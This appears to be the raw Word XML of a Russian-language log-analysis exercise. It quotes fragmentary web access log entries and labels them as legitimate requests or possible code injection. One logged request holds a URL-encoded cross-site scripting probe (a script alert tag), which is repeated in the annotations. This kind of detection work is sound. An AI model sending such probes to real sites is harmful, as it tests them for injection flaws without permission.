    <w:p w14:paraId="7F4ECC90" w14:textId="7ABD643A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EBAF949" w14:textId="75FA34DE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ACB1034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0AB34A" w14:textId="7B394F90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85.117.101.215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2/order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7.1.2;+Redmi+4X+Build/N2G47H;+wv)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Version/4.0+Chrome/110.0.5481.63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f=startOurProductsMybottles&amp;startedFrom=page_grid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60AE3BC0" w14:textId="17371915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F840C26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37C9F66C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8CE4D6" w14:textId="59FF6520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d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212.96.75.22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    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p/linea-8035154p-55-zoloto-100959802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0;+SM-G960F+Build/QP1A.190711.020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age%5Bnumber%5D=1&amp;page%5Bsize%5D=100&amp;filter%5Borders%5D%5Bstate%5D=ARCHIVE&amp;filter%5Borders%5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35D758F0" w14:textId="217BC0A3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399F1B4" w14:textId="13BC1A54" w:rsidR="0078490A" w:rsidRPr="00A04197" w:rsidRDefault="00A04197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sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>///////////////</w:t>
      </w:r>
      <w:r w:rsidRPr="00A041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гитимные запросы </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25E5D8FC" w14:textId="77777777" w:rsidR="00A04197" w:rsidRPr="00A04197" w:rsidRDefault="00A04197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33E678" w14:textId="63DA3A9D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esa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76.64.15.50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3;+2109119DG+Build/TKQ1.220829.002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-RU&amp;code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&amp;query=%D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47D2E2B3" w14:textId="3D74DCF1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en-US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запросы</w:t>
      </w:r>
      <w:r w:rsidR="00A04197" w:rsidRPr="00A041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04197"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</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00A04197"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="00A04197"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-RU&amp;code</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00A04197"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&amp;query=%D0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46078A07" w14:textId="2A470516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9AEEF8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1D65D5" w14:textId="2FCE48A2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com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213.109.220.40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2/order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1;+Redmi+Note+9+Pro+Build/RKQ1.200826.002;+wv)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Version/4.0+Chrome/109.0.5414.117+Mobile+Safari/537.36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ref=startOurProductsMybottles&amp;startedFrom=services&amp;ap-product=mybottle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004FBF27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17C52C99" w14:textId="024C9BFA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0086BFF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D866DC" w14:textId="6E23F13D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89.43.165.175 10.2.50.2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1;+Redmi+Note+9S+Build/RKQ1.200826.002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ter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orders][code]=24238931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73EA90EA" w14:textId="08C6669C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196FC71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en-US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</w:t>
      </w:r>
      <w:r w:rsidRPr="00A041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запросы</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="013E4A26" w14:textId="285F576C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A98427" w14:textId="77777777" w:rsidR="00E671BF" w:rsidRPr="00A04197" w:rsidRDefault="00E671BF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EECE88" w14:textId="4DAF488E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88.246.252.144 10.17.8.22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/market/p/linea-8035154p-55-zoloto-100959802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7.1.2;+Redmi+4X+Build/N2G47H;+wv)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Version/4.0+Chrome/110.0.5481.63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-RU&amp;code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&amp;query=%D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587F44A1" w14:textId="5089DE12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4193FA4" w14:textId="29295294" w:rsidR="00A04197" w:rsidRPr="00A04197" w:rsidRDefault="00A0419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/////////запрос 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amp;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&amp;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ery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%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возможно хотели добавить код</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="246AFFAB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75EB41" w14:textId="37DF0F06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ket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212.96.73.141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/bottles/dashboardapi2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bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0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1/Dashboard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ampleRequest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1;+Redmi+Note+9S+Build/RKQ1.200826.002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source=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kz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3E3FB5AB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03503319" w14:textId="36C4F85C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78B6B1" w14:textId="77777777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CF1121" w14:textId="5B0589E7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198.45.116.196 10.17.8.228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2/order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1;+Redmi+Note+9S+Build/RKQ1.200826.002;+wv)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Version/4.0+Chrome/109.0.5414.117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limit=9&amp;pag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154E024A" w14:textId="0DFD9A8A" w:rsidR="0078490A" w:rsidRPr="00A04197" w:rsidRDefault="00A0419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////////легитимные запросы </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DC618BF" w14:textId="77777777" w:rsidR="00A04197" w:rsidRPr="00A04197" w:rsidRDefault="00A04197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D0E3C6" w14:textId="6CBA9AC2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85.117.101.213 10.2.1.12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GET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/market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v2/orders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7.1.2;+Redmi+4X+Build/N2G47H;+wv)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Version/4.0+Chrome/110.0.5481.63+Mobile+Safari/537.3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%3Cscript%3Ealert%28%22testbottles%22%29%3C%2Fscript%3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4DD0086D" w14:textId="40E0127E" w:rsidR="0078490A" w:rsidRPr="00A04197" w:rsidRDefault="0078490A" w:rsidP="009F7CE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323DE4" w14:textId="4CD10D7E" w:rsidR="0078490A" w:rsidRPr="00A04197" w:rsidRDefault="00A04197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///////////</w:t>
      </w:r>
      <w:r w:rsidRPr="00A04197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</w:t>
      </w:r>
      <w:r w:rsidRPr="00A041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%3Cscript%3Ealert%28%22testbottles%22%29%3C%2Fscript%3E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FF2DD5B" w14:textId="77777777" w:rsidR="00A04197" w:rsidRPr="00A04197" w:rsidRDefault="00A04197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BEF307" w14:textId="77777777" w:rsidR="009F7CE7" w:rsidRPr="00A04197" w:rsidRDefault="009F7CE7" w:rsidP="009F7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-02-15T08:32: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.kaspi.lab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43 78.109.151.117 10.2.50.2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ST /maps/</w:t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logo/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-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0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265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78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0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479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16947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HTTP/1.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Mozilla/5.0+(</w:t>
      </w:r>
      <w:proofErr w:type="gram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;+</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd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id+12;+SM-A315F+Build/SP1A.210812.016;+wv)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Version/4.0+Chrome/109.0.5414.117+Mobile+Safari/537.366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c=750000000&amp;sr=1</w:t>
      </w:r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041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pi.lab</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="2D29315F" w14:textId="77777777" w:rsidR="00E671BF" w:rsidRPr="00A04197" w:rsidRDefault="00E671BF" w:rsidP="00E671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ru-RU"/>
        </w:rPr>
        <w:t>/////</w:t>
      </w:r>
      <w:r w:rsidRPr="00A04197">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>легитимные запросы</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0000000C" w14:textId="77777777" w:rsidR="00F3678C" w:rsidRPr="00A04197" w:rsidRDefault="00F3678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3678C" w:rsidRPr="00A0419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B148B"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="39722B66"/>
    <w:lvl w:ilvl="0" w:tplc="EA2AD2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8C"/>
    <w:rsid w:val="006F14DE"/>
    <w:rsid w:val="0078490A"/>
    <w:rsid w:val="0099660A"/>
    <w:rsid w:val="009F7CE7"/>
    <w:rsid w:val="00A04197"/>
    <w:rsid w:val="00B277C6"/>
    <w:rsid w:val="00BA14AC"/>
    <w:rsid w:val="00D54CDD"/>
    <w:rsid w:val="00E671BF"/>
    <w:rsid w:val="00EA0F9D"/>
    <w:rsid w:val="00ED292C"/>
    <w:rsid w:val="00F3678C"/>
    <w:rsid w:val="00F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BAED"/>
  <w15:docId w15:val="{A43DA3F6-76EA-4FE6-AE7F-3334DC10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277C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D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BA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2whois.ru/?t=dns&amp;data=kaspi.kz" TargetMode="External"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://regex101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2whois.ru/?t=dns&amp;data=kaspi.kz" TargetMode="External"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://docs.google.com/document/d/1x4K2j_h8nWc5ZMiCSG1bxtszOY-C5lTTY3jxFEzm_c0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yyeX-k41kGQmooiRkb3Vll9D8s618JKoEmsckvZiZMQ/edit?usp=sharing" TargetMode="External"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://docs.google.com/document/d/1HGOdWXNmcJ2W7Xtf5t013YUPdeY1Mt_laRbAaFL2qvI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nt/d/1iUYctt71yq2J7z6Ge3WlrNm_R610SH1tsecsl-_1vyQ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6981-A9F0-44AC-8AD0-81659B2B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2</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2023-02-21T17:00:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2023-02-21T19:08:00Z</dcterms:modified>
</cp:coreProperties>
</file>